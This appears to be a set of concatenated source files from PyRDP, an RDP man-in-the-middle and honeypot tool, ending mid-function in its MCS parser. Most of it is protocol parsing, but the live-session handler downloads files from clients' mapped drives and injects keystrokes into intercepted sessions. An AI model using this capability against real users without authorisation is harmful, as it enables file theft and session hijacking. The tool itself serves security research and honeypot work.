#
# This file is part of the PyRDP project.
# Copyright (C) 2021, 2022 GoSecure Inc.
# Licensed under the GPLv3 or later.
#
from pyrdp.convert.PCAPStream import PCAPStream
from pyrdp.convert.pyrdp_scapy import *
from pyrdp.convert.utils import extractInetAddressesFromPDUPacket, InetAddress


class ExportedPDUStream(PCAPStream):
    """
    PDU stream for converting sessions that contain Wireshark Exported PDU.
    """

    def __init__(self, client: InetAddress, server: InetAddress, packets: PacketList):
        super().__init__(client, server)
        self.packets = packets
        self.n = 0

    def __len__(self):
        return len(self.packets)

    def __iter__(self):
        return self

    def __next__(self):
        while True:
            if self.n >= len(self):
                raise StopIteration

            packet = self.packets[self.n]
            src, dst = extractInetAddressesFromPDUPacket(packet)
            data = packet.load[60:]
            self.n += 1

            return PCAPStream.output(data, packet.time, src, dst)



#
# This file is part of the PyRDP project.
# Copyright (C) 2018 GoSecure Inc.
# Licensed under the GPLv3 or later.
#

from pyrdp.enum import InputEventType
from pyrdp.pdu.pdu import PDU


class SlowPathInput(PDU):
    def __init__(self, eventTime, messageType):
        super().__init__()
        self.eventTime = eventTime
        self.messageType = messageType


class SynchronizeEvent(SlowPathInput):
    def __init__(self, eventTime, flags):
        SlowPathInput.__init__(self, eventTime, InputEventType.INPUT_EVENT_SYNC)
        self.flags = flags


class UnusedEvent(SlowPathInput):
    def __init__(self, eventTime):
        SlowPathInput.__init__(self, eventTime, InputEventType.INPUT_EVENT_UNUSED)


class KeyboardEvent(SlowPathInput):
    def __init__(self, eventTime, flags, keyCode):
        SlowPathInput.__init__(self, eventTime, InputEventType.INPUT_EVENT_SCANCODE)
        self.flags = flags
        self.keyCode = keyCode


class UnicodeKeyboardEvent(SlowPathInput):
    def __init__(self, eventTime, flags, keyCode):
        SlowPathInput.__init__(self, eventTime, InputEventType.INPUT_EVENT_UNICODE)
        self.flags = flags
        self.keyCode = keyCode


class MouseEvent(SlowPathInput):
    def __init__(self, eventTime, flags, x, y):
        SlowPathInput.__init__(self, eventTime, InputEventType.INPUT_EVENT_MOUSE)
        self.flags = flags
        self.x = x
        self.y = y


class ExtendedMouseEvent(SlowPathInput):
    def __init__(self, eventTime, flags, x, y):
        SlowPathInput.__init__(self, eventTime, InputEventType.INPUT_EVENT_MOUSEX)
        self.flags = flags
        self.x = x
        self.y = y


#
# This file is part of the PyRDP project.
# Copyright (C) 2019, 2023 GoSecure Inc.
# Licensed under the GPLv3 or later.
#
from logging import LoggerAdapter
from pathlib import Path, PosixPath
from typing import BinaryIO, Dict, Union

from PySide6.QtCore import Signal
from PySide6.QtWidgets import QTextEdit

from pyrdp.enum import DeviceType, PlayerPDUType
from pyrdp.layer import PlayerLayer
from pyrdp.pdu import PlayerDeviceMappingPDU, PlayerDirectoryListingRequestPDU, PlayerDirectoryListingResponsePDU, \
    PlayerFileDownloadCompletePDU, PlayerFileDownloadRequestPDU, PlayerFileDownloadResponsePDU, PlayerPDU
from pyrdp.parser import ClientConnectionParser
from pyrdp.player import LiveTab
from pyrdp.player.FileDownloadDialog import FileDownloadDialog
from pyrdp.player.filesystem import DirectoryObserver, Directory, Drive, File, FileSystem, FileSystemItemType
from pyrdp.player.PlayerEventHandler import PlayerEventHandler
from pyrdp.ui import QRemoteDesktop

import os

class LiveEventHandler(PlayerEventHandler, DirectoryObserver):
    """
    Event handler used for live connections. Handles the same events as the replay handler, plus directory listing and
    file read events. Also dispatches download requested by the player.
    """

    addIconToTab = Signal(object)
    connectionClosed = Signal(object)
    renameTab = Signal(object, str)

    def __init__(self, viewer: QRemoteDesktop, text: QTextEdit, log: LoggerAdapter, fileSystem: FileSystem, layer: PlayerLayer, tabInstance: LiveTab):
        super().__init__(viewer, text)
        self.log = log
        self.fileSystem = fileSystem
        self.layer = layer
        self.drives: Dict[int, Drive] = {}
        self.downloadDirectories: Dict[str, Directory] = {}
        self.downloadFiles: Dict[str, BinaryIO] = {}
        self.downloadDialogs: Dict[str, FileDownloadDialog] = {}
        self.tabInstance = tabInstance

        # Clicking on an item and "downloading" is a job. Only one job at a time.
        # We need to process each job independently to keep the dialog reliable
        self.jobsQueue = set()
        self.directoryDownloadQueue = set()
        self.fileDownloadQueue = set()
        self.currentDownload = None

        self.handlers[PlayerPDUType.DIRECTORY_LISTING_RESPONSE] = self.handleDirectoryListingResponse
        self.handlers[PlayerPDUType.FILE_DOWNLOAD_RESPONSE] = self.handleDownloadResponse
        self.handlers[PlayerPDUType.FILE_DOWNLOAD_COMPLETE] = self.handleDownloadComplete
        self.handlers[PlayerPDUType.CLIENT_DATA] = self.onClientData
        self.handlers[PlayerPDUType.CONNECTION_CLOSE] = self.onConnectionClose


    def onClientData(self, pdu: PlayerPDU):
        """
        Message the LiveWindow to rename the tab to the hostname of the client
        """

        clientDataPDU = ClientConnectionParser().parse(pdu.payload)
        clientName = clientDataPDU.coreData.clientName.strip("\x00")

        self.renameTab.emit(self.tabInstance, clientName)
        super().onClientData(pdu)


    def onConnectionClose(self, pdu: PlayerPDU):
        """
        Message the LiveWindow that this tab's connection is closed
        """

        self.connectionClosed.emit(self.tabInstance)
        super().onConnectionClose(pdu)

    def onDeviceMapping(self, pdu: PlayerDeviceMappingPDU):
        super().onDeviceMapping(pdu)

        if pdu.deviceType == DeviceType.RDPDR_DTYP_FILESYSTEM:
            self.addIconToTab.emit(self.tabInstance)
            drive = self.fileSystem.addDrive(pdu.name, pdu.deviceID)
            drive.addObserver(self)
            self.drives[drive.deviceID] = drive

    def onListDirectory(self, deviceID: int, path: str):
        request = PlayerDirectoryListingRequestPDU(self.layer.getCurrentTimeStamp(), deviceID, path)
        self.layer.sendPDU(request)

    def addToDownloadQueue(self, item: Union[File, Directory], targetPath: str, dialog: FileDownloadDialog):
        job = (item, targetPath, dialog)

        self.jobsQueue.add(job)

        if self.currentDownload is None:
            self.dispatchDownload()

    def dispatchDownload(self):
        """
        Since the download is single-threaded, we need to queue everything.
        When requesting the download of a file, it gets queued in fileDownloadQueue.
        When requesting the download of a directory, it gets queued in directoryDownloadQueue.

        When flagging a directory for download, we queue all of his files and directory for download.
        We then download each file of a directory before enumerating other directories.
        When we're done with both file and directories, we start an other queued job
        """

        # Request download of a queued file
        if len(self.fileDownloadQueue) != 0:
            file, savePath, dialog = self.fileDownloadQueue.pop()

            self.currentDownload = file.getFullPath()
            self.onFileDownloadRequested(file, savePath, dialog)

        # Request download of a queued directory
        elif len(self.directoryDownloadQueue) != 0:
            directory, path, dialog = self.directoryDownloadQueue.pop()

            self.currentDownload = directory.getFullPath()
            self.onDirectoryDownloadRequested(directory, path, dialog)

        # Process queued jobs
        elif len(self.jobsQueue) != 0:
            item, path, dialog = self.jobsQueue.pop()
            self.currentDownload = item.getFullPath()

            if isinstance(item, File):
                self.onFileDownloadRequested(item, path, dialog)

            elif isinstance(item, Directory):
                self.onDirectoryDownloadRequested(item, path, dialog)
        else:
            self.currentDownload = None

    def handleDirectoryListingResponse(self, response: PlayerDirectoryListingResponsePDU):
        """
        List the files and subdirectories of a directory.

        If any files or subdirectories have been requested for download,
        we queue them in the appropriate download queue.

        Otherwise, update the directory list.
        """

        for description in response.fileDescriptions:
            path = PosixPath(description.path)
            parts = path.parts
            directoryNames = list(parts[1 : -1])
            fileName = path.name

            if fileName in ["", ".", ".."]:
                continue

            drive = self.drives[response.deviceID]

            currentDirectory = drive
            while len(directoryNames) > 0:
                currentName = directoryNames.pop(0)

                newDirectory = None

                for directory in currentDirectory.directories:
                    if directory.name == currentName:
                        newDirectory = directory
                        break

                if newDirectory is None:
                    return

                currentDirectory = newDirectory

            if description.isDirectory:
                # If the directory is not flagged as downloading, but the parent is
                if not self.downloadDirectories.get(str(path)) and self.downloadDirectories.get(str(path.parent)):
                    # Create directory on disk
                    parentPath = self.downloadDirectories[str(path.parent)]
                    directoryPath = f"{parentPath}/{fileName}"

                    os.mkdir(directoryPath)

                    # Queue downloads requests
                    directory = Directory(fileName, currentDirectory)
                    dialog = self.downloadDialogs[str(path.parent)]
                    self.directoryDownloadQueue.add((directory, directoryPath, dialog))
                else:
                    currentDirectory.addDirectory(fileName)
            else:
                # If the directory is flagged as download, download the file
                if self.downloadDirectories.get(str(path.parent)):
                    # Create file on disk
                    parentPath = self.downloadDirectories[str(path.parent)]
                    filePath = f"{parentPath}/{fileName}"

                    file = File(fileName, currentDirectory)

                    # Queue downloads requests
                    dialog = self.downloadDialogs[str(path.parent)]
                    dialog.incrementDownloadTotal()
                    self.fileDownloadQueue.add((file, filePath, dialog))
                else:
                    currentDirectory.addFile(fileName)

        # Having 10 files means another chunk is coming, wait for it
        if len(response.fileDescriptions) != 10:
            self.dispatchDownload()

    def onFileDownloadRequested(self, file: File, targetPath: str, dialog: FileDownloadDialog):
        """
        Create the file on disk and request it for download to the client.
        """

        remotePath = file.getFullPath()

        self.log.info("Saving %(remotePath)s to %(targetPath)s", {"remotePath": remotePath, "targetPath": targetPath})

        if file.parent is None:
            self.log.error("Cannot save file without drive information.")
            return

        parent = file.getRootParent()

        if parent.type != FileSystemItemType.Drive:
            self.log.error("Cannot save file: root parent is not a drive.")
            return

        try:
            targetFile = open(targetPath, "wb")
        except Exception as e:
            self.log.error("Cannot save file: %(exception)s", {"exception": str(e)})
            return

        self.downloadFiles[remotePath] = targetFile
        self.downloadDialogs[remotePath] = dialog

        pdu = PlayerFileDownloadRequestPDU(self.layer.getCurrentTimeStamp(), parent.deviceID, remotePath)
        self.layer.sendPDU(pdu)

    def onDirectoryDownloadRequested(self, directory: Directory, targetPath: str, dialog: FileDownloadDialog):
        """
        Flag the requested directory for download and request to list his files and subdirectories.
        Each of the files and subdirectories will be queued for download.
        """

        remotePath = directory.getFullPath()

        if directory.parent is None:
            self.log.error("Cannot save directory without drive information.")
            return

        parent = directory.getRootParent()

        if parent.type != FileSystemItemType.Drive:
            self.log.error("Cannot save directory: root parent is not a drive.")
            return

        self.downloadDirectories[remotePath] = targetPath
        self.downloadDialogs[remotePath] = dialog

        pdu = PlayerDirectoryListingRequestPDU(self.layer.getCurrentTimeStamp(), parent.deviceID, remotePath)
        self.layer.sendPDU(pdu)

    def handleDownloadResponse(self, response: PlayerFileDownloadResponsePDU):
        """
        Write the received data to the file being downloaded and update the dialog's download progress.
        """

        remotePath = response.path

        if remotePath not in self.downloadFiles:
            return

        targetFile = self.downloadFiles[remotePath]
        targetFile.write(response.payload)

        dialog = self.downloadDialogs[remotePath]
        dialog.reportProgress(len(response.payload))

    def handleDownloadComplete(self, response: PlayerFileDownloadCompletePDU):
        """
        Update the download dialog and remove the file from the list of files to be downloaded.
        """

        remotePath = response.path

        if remotePath not in self.downloadFiles:
            return

        targetFile = self.downloadFiles.pop(remotePath)
        targetFileName = targetFile.name
        targetFile.close()

        dialog = self.downloadDialogs.pop(remotePath)
        dialog.incrementDownloadCount()

        # Report completion if there are no more queued jobs (multiple download)
        # or if no one else uses this dialog (single download)
        if len(self.fileDownloadQueue) == 0 and len(self.directoryDownloadQueue) == 0:
            dialog.reportCompletion(response.error)
            self.downloadDirectories.clear()

        if response.error != 0:
            self.log.error("Error happened when downloading %(remotePath)s. The file may not have been saved completely. Error code: %(errorCode)s", {
                "remotePath": remotePath,
                "errorCode": "0x%08lx" % response.error,
            })

            try:
                Path(targetFileName).unlink()
            except Exception as e:
                self.log.error("Error when deleting file %(path)s: %(exception)s", {"path": targetFileName, "exception": str(e)})
        else:
            self.log.info("Download %(path)s complete.", {"path": targetFile.name})
            self.dispatchDownload()



#
# This file is part of the PyRDP project.
# Copyright (C) 2018 GoSecure Inc.
# Licensed under the GPLv3 or later.
#

from enum import IntFlag


class VirtualChannelPDUFlag(IntFlag):
    """
    https://msdn.microsoft.com/en-us/library/cc240553.aspx
    """

    CHANNEL_FLAG_FIRST = 0x00000001
    CHANNEL_FLAG_LAST = 0x00000002
    CHANNEL_FLAG_SHOW_PROTOCOL = 0x00000010
    CHANNEL_FLAG_SUSPEND = 0x00000020
    CHANNEL_FLAG_RESUME = 0x00000040
    CHANNEL_PACKET_COMPRESSED = 0x00200000
    CHANNEL_PACKET_AT_FRONT = 0x00400000
    CHANNEL_PACKET_FLUSHED = 0x00800000
    CompressionTypeMask = 0x000F0000





#
# This file is part of the PyRDP project.
# Copyright (C) 2022 GoSecure Inc.
# Licensed under the GPLv3 or later.
#

# Disable line-too-long lints.
# flake8: noqa

from enum import IntEnum


class NtStatusSeverity(IntEnum):
    """
    [MS-ERREF]: Windows Error Codes
    https://msdn.microsoft.com/en-us/library/cc231199.aspx
    [MS-ERREF]: NTSTATUS
    https://msdn.microsoft.com/en-us/library/cc231200.aspx
    """
    STATUS_SEVERITY_SUCCESS = 0x0
    STATUS_SEVERITY_INFORMATIONAL = 0x1
    STATUS_SEVERITY_WARNING = 0x2
    STATUS_SEVERITY_ERROR = 0x3


class NTSTATUS(IntEnum):
    """
    [MS-ERREF]: Windows Error Codes
    https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-erref/87fba13e-bf06-450e-83b1-9241dc81e781
    """
    @classmethod
    # Some Clients can return other Error codes. Rather than hardcode 1000s
    # of possible Status codes Just handle the ones we need to and create a catch-all
    # for the ones we don't care about so we don't throw an exception.
    def _missing_(cls, value):
        other = NTSTATUS(0x00000000)
        other._name_ = "STATUS_PYRDP_FAILURE"
        other._value_ = value
        return other

    STATUS_SUCCESS       = 0x00000000
    STATUS_NO_MORE_FILES = 0x80000006
    STATUS_NO_SUCH_FILE  = 0xC000000F
    STATUS_ACCESS_DENIED = 0xC0000022



#
# This file is part of the PyRDP project.
# Copyright (C) 2018-2023 GoSecure Inc.
# Licensed under the GPLv3 or later.
#
from typing import List

from PySide6.QtCore import Qt, Signal
from PySide6.QtGui import QAction
from PySide6.QtWidgets import QFileDialog, QInputDialog, QMainWindow, QTabWidget

from pyrdp.player import BaseTab
from pyrdp.player.LiveWindow import LiveWindow
from pyrdp.player.ReplayWindow import ReplayWindow


class MainWindow(QMainWindow):
    """
    Main window for the player application.
    """

    updateCountSignal = Signal()

    def __init__(self, bind_address: str, port: int, filesToRead: [str]):
        """
        :param bind_address: address to bind to when listening for live connections.
        :param port: port to bind to when listening for live connections.
        :param filesToRead: replay files to open.
        """
        super().__init__()

        # TODO : Rework into a class if we add more options later.
        self.options = {
            "focusNewTab": True,        # Useful whenever we are getting flooded with connections (or scanned), and we only want to monitor one at a time.
            "closeTabOnCtrlW": True     # Allow user to toggle Ctrl+W passthrough.
        }

        self.liveWindow = LiveWindow(bind_address, port, self.updateCountSignal, self.options, parent=self)
        self.replayWindow = ReplayWindow(self.options, parent=self)
        self.tabManager = QTabWidget()
        self.tabManager.addTab(self.liveWindow, "Live connections")
        self.tabManager.addTab(self.replayWindow, "Replays")
        self.setCentralWidget(self.tabManager)
        self.updateCountSignal.connect(self.updateTabConnectionCount)
        self.resizeObservers: List[BaseTab] = []

        # File menu
        openAction = QAction("Open...", self)
        openAction.setShortcut("Ctrl+O")
        openAction.setStatusTip("Open a replay file")
        openAction.triggered.connect(self.onOpenFile)

        # Command menu
        windowsRAction = QAction("Windows+R", self)
        windowsRAction.setShortcut("Ctrl+Alt+R")
        windowsRAction.setStatusTip("Send a Windows+R key sequence")
        windowsRAction.triggered.connect(lambda: self.sendKeySequence([Qt.Key.Key_Meta, Qt.Key.Key_R]))

        windowsLAction = QAction("Windows+L", self)
        windowsLAction.setShortcut("Ctrl+Alt+L")
        windowsLAction.setStatusTip("Send a Windows+L key sequence")
        windowsLAction.triggered.connect(lambda: self.sendKeySequence([Qt.Key.Key_Meta, Qt.Key.Key_L]))

        windowsEAction = QAction("Windows+E", self)
        windowsEAction.setShortcut("Ctrl+Alt+E")
        windowsEAction.setStatusTip("Send a Windows+E key sequence")
        windowsEAction.triggered.connect(lambda: self.sendKeySequence([Qt.Key.Key_Meta, Qt.Key.Key_E]))

        typeTextAction = QAction("Type text...", self)
        typeTextAction.setShortcut("Ctrl+Alt+T")
        typeTextAction.setStatusTip("Simulate typing on the keyboard")
        typeTextAction.triggered.connect(self.sendText)

        # Options menu
        focusTabAction = QAction("Focus new connections", self)
        focusTabAction.setCheckable(True)
        focusTabAction.setChecked(self.options.get("focusNewTab"))
        focusTabAction.triggered.connect(lambda: self.toggleFocusNewTab())

        closeTabOnCtrlW = QAction("Close current tab on Ctrl+W", self)
        closeTabOnCtrlW.setCheckable(True)
        closeTabOnCtrlW.setChecked(self.options.get("closeTabOnCtrlW"))
        closeTabOnCtrlW.triggered.connect(lambda: self.toggleCloseTabOnCtrlW())

        # Create menu
        menuBar = self.menuBar()

        fileMenu = menuBar.addMenu("File")
        fileMenu.addAction(openAction)

        commandMenu = menuBar.addMenu("Command")
        commandMenu.addAction(windowsRAction)
        commandMenu.addAction(windowsLAction)
        commandMenu.addAction(windowsEAction)
        commandMenu.addAction(typeTextAction)

        optionsMenu = menuBar.addMenu("Options")
        optionsMenu.addAction(focusTabAction)
        optionsMenu.addAction(closeTabOnCtrlW)

        # If there's only one replay, play it immediately.
        if len(filesToRead) == 1:
            self.tabManager.setCurrentWidget(self.replayWindow)
            self.replayWindow.openFile(filesToRead[0], autoplay=True)
        else:
            for f in filesToRead:
                self.replayWindow.openFile(f)

    def onOpenFile(self):
        fileNames, _ = QFileDialog.getOpenFileNames(self, "Open File(s)")

        if fileNames:
            self.tabManager.setCurrentWidget(self.replayWindow)
            for fileName in fileNames:
                self.replayWindow.openFile(fileName)

    def sendKeySequence(self, keys: [Qt.Key]):
        if self.tabManager.currentWidget() is self.liveWindow:
            self.liveWindow.sendKeySequence(keys)

    def sendText(self):
        if self.tabManager.currentWidget() is not self.liveWindow:
            return

        text, success = QInputDialog.getMultiLineText(self, "Type text...", "Text to type:")

        if not success:
            return

        self.liveWindow.sendText(text)

    def toggleFocusNewTab(self):
        self.options["focusNewTab"] = not self.options.get("focusNewTab")

    def toggleCloseTabOnCtrlW(self):
        self.options["closeTabOnCtrlW"] = not self.options.get("closeTabOnCtrlW")

    def updateTabConnectionCount(self):
        """
        Update the first tab (Live connections) with the current number of tabs
        """

        self.tabManager.setTabText(0, "Live connections (%d)" % self.liveWindow.count())



#
# This file is part of the PyRDP project.
# Copyright (C) 2019-2021 GoSecure Inc.
# Licensed under the GPLv3 or later.
#

from pyrdp.enum import SegmentationPDUType
from pyrdp.layer import FastPathLayer, LayerChainItem, MCSLayer, SecurityLayer, SegmentationLayer, SlowPathLayer, \
    TPKTLayer, TwistedTCPLayer, X224Layer


class RDPLayerSet:
    """
    Class that handles initialization of regular (non-virtual channel) RDP layers.
    """

    def __init__(self):
        self.tcp = TwistedTCPLayer()
        self.segmentation = SegmentationLayer()
        self.tpkt = TPKTLayer()
        self.x224 = X224Layer()
        self.mcs = MCSLayer()
        self.security: SecurityLayer = None
        self.slowPath = SlowPathLayer()
        self.fastPath: FastPathLayer = None

        self.tcp.setNext(self.segmentation)
        self.segmentation.attachLayer(SegmentationPDUType.TPKT, self.tpkt)
        LayerChainItem.chain(self.tpkt, self.x224, self.mcs)

    def replaceTCP(self):
        self.tcp = TwistedTCPLayer()
        self.tcp.setNext(self.segmentation)
        self.segmentation.attachLayer(SegmentationPDUType.TPKT, self.tpkt)



#
# This file is part of the PyRDP project.
# Copyright (C) 2018 GoSecure Inc.
# Licensed under the GPLv3 or later.
#

from enum import IntEnum


class CbId(IntEnum):
    """
    https://msdn.microsoft.com/en-us/library/cc241267.aspx
    """
    ONE_BYTE = 0x00
    TWO_BYTE = 0x01
    FOUR_BYTES = 0x02
    INVALID = 0x03


class DynamicChannelCommand(IntEnum):
    """
    https://msdn.microsoft.com/en-us/library/cc241267.aspx
    """
    CREATE = 0x01
    DATA_FIRST = 0x02
    DATA = 0x03
    CLOSE = 0x04
    CAPABILITY_REQUEST = 0x05
    DATA_FIRST_COMPRESSED = 0x06
    DATA_COMPRESSED = 0x07
    SOFT_SYNC_REQUEST = 0x08
    SOFT_SYNC_RESPONSE = 0x09



#
# This file is part of the PyRDP project.
# Copyright (C) 2018, 2019, 2021 GoSecure Inc.
# Licensed under the GPLv3 or later.
#

from io import BytesIO

from pyrdp.core import per, Uint16BE
from pyrdp.enum import GCCPDUType
from pyrdp.exceptions import ParsingError, UnknownPDUTypeError
from pyrdp.parser.parser import Parser
from pyrdp.pdu import GCCConferenceCreateRequestPDU, GCCConferenceCreateResponsePDU, GCCPDU


class GCCParser(Parser):
    """
    Parser class to read and write GCC (T.124) PDUs.
    """

    T124_02_98_OID = (0, 0, 20, 124, 0, 1)
    H221_CLIENT_KEY = b"Duca"
    H221_SERVER_KEY = b"McDn"
    NODE_ID = 0x79f3

    def __init__(self):
        super().__init__()
        self.parsers = {
            GCCPDUType.CREATE_CONFERENCE_REQUEST: self.parseConferenceCreateRequest,
            GCCPDUType.CREATE_CONFERENCE_RESPONSE: self.parseConferenceCreateResponse,
        }

        self.writers = {
            GCCPDUType.CREATE_CONFERENCE_REQUEST: self.writeConferenceCreateRequest,
            GCCPDUType.CREATE_CONFERENCE_RESPONSE: self.writeConferenceCreateResponse,
        }

    def doParse(self, data: bytes) -> GCCPDU:
        """
        Parses the raw data bytes into a GCCPDU
        :param data: PDU data.
        """
        stream = BytesIO(data)

        tag = per.readChoice(stream)

        if tag != 0:
            raise ParsingError("Expected object tag (0), got %d instead" % tag)

        oid = per.readObjectIdentifier(stream)

        if oid != GCCParser.T124_02_98_OID:
            raise ParsingError("Invalid object identifier: %r, expected %r" % (oid, GCCParser.T124_02_98_OID))

        _length = per.readLength(stream)
        header = per.readChoice(stream)

        if header not in self.parsers:
            raise UnknownPDUTypeError("Trying to parse unknown GCC PDU type %s" % header, header)

        pdu = self.parsers[header](stream)

        return pdu

    def parseConferenceCreateRequest(self, stream: BytesIO) -> GCCConferenceCreateRequestPDU:
        """
        Parse ConferenceCreateRequest data into a GCCPDU
        :param stream: byte stream containing the PDU data
        """
        prop = per.readSelection(stream)

        if prop != 8:
            raise ParsingError("Expected property to be 8 (conference name), got %d" % prop)

        conferenceName = per.readNumericString(stream, 1)
        stream.read(1)

        userDataCount = per.readNumberOfSet(stream)
        if userDataCount != 1:
            raise ParsingError("Expected user data count to be 1, got %d" % userDataCount)

        userDataType = per.readChoice(stream)
        if userDataType != 0xc0:
            raise ParsingError("Expected user data type to be 0xc0 (h221NonStandard), got %d" % userDataType)

        key = per.readOctetStream(stream, 4)
        if key != GCCParser.H221_CLIENT_KEY:
            raise ParsingError("Expected user data key to be %s, got %s" % (GCCParser.H221_CLIENT_KEY, key))

        payload = per.readOctetStream(stream)
        return GCCConferenceCreateRequestPDU(conferenceName, payload)

    def parseConferenceCreateResponse(self, stream: BytesIO) -> GCCConferenceCreateResponsePDU:
        """
        Parse ConferenceCreateResponse data into a GCCPDU
        :param stream: byte stream containing the PDU data
        """

        nodeID = Uint16BE.unpack(stream.read(2)) + 1001
        tag = per.readInteger(stream)
        result = per.readEnumeration(stream)

        userDataCount = per.readNumberOfSet(stream)
        if userDataCount != 1:
            raise ParsingError("Expected user data count to be 1, got %d" % userDataCount)

        userDataType = per.readChoice(stream)
        if userDataType != 0xc0:
            raise ParsingError("Expected user data type to be 0xc0 (h221NonStandard), got %d" % userDataType)

        key = per.readOctetStream(stream, 4)
        if key != GCCParser.H221_SERVER_KEY:
            raise ParsingError("Expected user data key to be %s, got %s" % (GCCParser.H221_SERVER_KEY, key))

        payload = per.readOctetStream(stream)
        return GCCConferenceCreateResponsePDU(nodeID, tag, result, payload)

    def write(self, pdu: GCCPDU) -> bytes:
        """
        Encode a GCC PDU to bytes.
        :param pdu: gcc PDU.
        """
        if pdu.header not in self.writers:
            raise UnknownPDUTypeError("Trying to write unknown GCC PDU type %s" % pdu.header, pdu.header)

        stream = BytesIO()
        stream.write(per.writeChoice(0))
        stream.write(per.writeObjectIdentifier(GCCParser.T124_02_98_OID))
        # XRDP compatiblity returning bad capability type
        # ref https://github.com/GoSecure/pyrdp/issues/294
        stream.write(per.writeLength(len(pdu.payload) + 14))
        stream.write(per.writeChoice(pdu.header))

        self.writers[pdu.header](stream, pdu)
        return stream.getvalue()

    def writeConferenceCreateRequest(self, stream: BytesIO, pdu: GCCConferenceCreateRequestPDU):
        """
        Write a GCCConferenceCreateRequestPDU to a stream.
        :param stream: byte stream to put the ConferenceCreateRequest data in.
        :param pdu: the PDU to write.
        """
        stream.write(per.writeSelection(8))
        stream.write(per.writeNumericString(pdu.conferenceName, 1))
        stream.write(per.writeEnumeration(0))
        stream.write(per.writeNumberOfSet(1))
        stream.write(per.writeChoice(0xc0))
        stream.write(per.writeOctetStream(GCCParser.H221_CLIENT_KEY, 4))
        stream.write(per.writeOctetStream(pdu.payload))

    def writeConferenceCreateResponse(self, stream: BytesIO, pdu: GCCConferenceCreateResponsePDU):
        """
        Write a GCCConferenceCreateResponsePDU to a stream.
        :param stream: byte stream to put the ConferenceCreateResponse data in.
        :param pdu: the PDU to write.
        """

        stream.write(Uint16BE.pack(GCCParser.NODE_ID - 1001))
        stream.write(per.writeInteger(1))
        stream.write(per.writeEnumeration(0))
        stream.write(per.writeNumberOfSet(1))
        stream.write(per.writeChoice(0xc0))
        stream.write(per.writeOctetStream(GCCParser.H221_SERVER_KEY, 4))
        stream.write(per.writeOctetStream(pdu.payload))



#
# This file is part of the PyRDP project.
# Copyright (C) 2018, 2019, 2021 GoSecure Inc.
# Licensed under the GPLv3 or later.
#

from collections import defaultdict
from io import BytesIO
from typing import Union

from pyrdp.core import ber, per, Uint16BE, Uint8
from pyrdp.enum import MCSChannelID, MCSPDUType
from pyrdp.exceptions import ParsingError, UnknownPDUTypeError
from pyrdp.parser.parser import Parser
from pyrdp.pdu import MCSAttachUserConfirmPDU, MCSAttachUserRequestPDU, MCSChannelJoinConfirmPDU, \
    MCSChannelJoinRequestPDU, MCSConnectInitialPDU, MCSConnectResponsePDU, MCSDisconnectProviderUltimatumPDU, \
    MCSDomainParams, MCSErectDomainRequestPDU, MCSPDU, MCSSendDataIndicationPDU, MCSSendDataRequestPDU


class MCSParser(Parser):
    """
    Parser class to read and write MCS (T.125) PDUs.
    """

    def __init__(self):
        super().__init__()
        self.parsers = {
            MCSPDUType.CONNECT_INITIAL: self.parseConnectInitial,
            MCSPDUType.CONNECT_RESPONSE: self.parseConnectResponse,
            MCSPDUType.ERECT_DOMAIN_REQUEST: self.parseErectDomainRequest,
            MCSPDUType.DISCONNECT_PROVIDER_ULTIMATUM: self.parseDisconnectProviderUltimatum,
            MCSPDUType.ATTACH_USER_REQUEST: self.parseAttachUserRequest,
            MCSPDUType.ATTACH_USER_CONFIRM: self.parseAttachUserConfirm,
            MCSPDUType.CHANNEL_JOIN_REQUEST: self.parseChannelJoinRequest,
            MCSPDUType.CHANNEL_JOIN_CONFIRM: self.parseChannelJoinConfirm,
            MCSPDUType.SEND_DATA_REQUEST: self.parseSendDataRequest,
            MCSPDUType.SEND_DATA_INDICATION: self.parseSendDataIndication,
        }

        self.writers = {
            MCSPDUType.CONNECT_INITIAL: self.writeConnectInitial,
            MCSPDUType.CONNECT_RESPONSE: self.writeConnectResponse,
            MCSPDUType.ERECT_DOMAIN_REQUEST: self.writeErectDomainRequest,
            MCSPDUType.DISCONNECT_PROVIDER_ULTIMATUM: self.writeDisconnectProviderUltimatum,
            MCSPDUType.ATTACH_USER_REQUEST: self.writeAttachUserRequest,
            MCSPDUType.ATTACH_USER_CONFIRM: self.writeAttachUserConfirm,
            MCSPDUType.CHANNEL_JOIN_REQUEST: self.writeChannelJoinRequest,
            MCSPDUType.CHANNEL_JOIN_CONFIRM: self.writeChannelJoinConfirm,
            MCSPDUType.SEND_DATA_REQUEST: self.writeSendDataRequest,
            MCSPDUType.SEND_DATA_INDICATION: self.writeSendDataIndication,
        }

        self.headerOptions = defaultdict(int)
        self.headerOptions[MCSPDUType.DISCONNECT_PROVIDER_ULTIMATUM] = 1
        self.headerOptions[MCSPDUType.ATTACH_USER_CONFIRM] = 2
        self.headerOptions[MCSPDUType.CHANNEL_JOIN_CONFIRM] = 2

    def doParse(self, data: bytes) -> MCSPDU:
        """
        Parse raw data bytes into a MCSPDU
        :param data: raw bytes to parse
        """

        stream = BytesIO(data)
        header = Uint8.unpack(stream.read(1))
        if header == ber.Class.BER_CLASS_APPL | ber.PC.BER_CONSTRUCT | ber.Tag.BER_TAG_MASK:
            header = Uint8.unpack(stream.read(1))
        else:
            header = header >> 2

        if header not in self.parsers:
            raise UnknownPDUTypeError("Trying to parse unknown MCS PDU type %s" % header, header)

        return self.parsers[header](stream)

    def parseDomainParams(self, stream: BytesIO) -> MCSDomainParams:
        """
        Parse a MCSDomainParam from stream
        :param stream: byte stream containing the data
        """
        if not ber.readUniversalTag(stream, ber.Tag.BER_TAG_SEQUENCE, True):
            raise ParsingError("Invalid BER tag (%d expected)" % ber.Tag.BER_TAG_SEQUENCE)

        length = ber.readLength(stream)
        if length > len(stream.getvalue()):
            raise ParsingError("Invalid size for DomainParameters (got %d, %d bytes left)" % (length, len(stream.getvalue())))

        maxChannelIDs = ber.readInteger(stream)
        maxUserIDs = ber.readInteger(stream)
        maxTokenIDs = ber.readInteger(stream)
        numPriorities = ber.readInteger(stream)
        minThroughput = ber.readInteger(stream)
        maxHeight = ber.readInteger(stream)
        maxMCSPDUSize = ber.readInteger(stream)
        protocolVersion = ber.readInteger(stream)
        return MCSDomainParams(maxChannelIDs, maxUserIDs, maxTokenIDs, numPriorities, minThroughput, maxHeight, maxMCSPDUSize, protocolVersion)

    def parseConnectInitial(self, stream: BytesIO) -> MCSConnectInitialPDU:
        """
        Parse a Connect Initial PDU
        :param stream: stream containing the data
        """
        _length = ber.readLength(stream)
        callingDomain = ber.readOctetString(stream)
        calledDomain = ber.readOctetString(stream)
        upward = ber.readBoolean(stream)
        targetParams = self.parseDomainParams(stream)
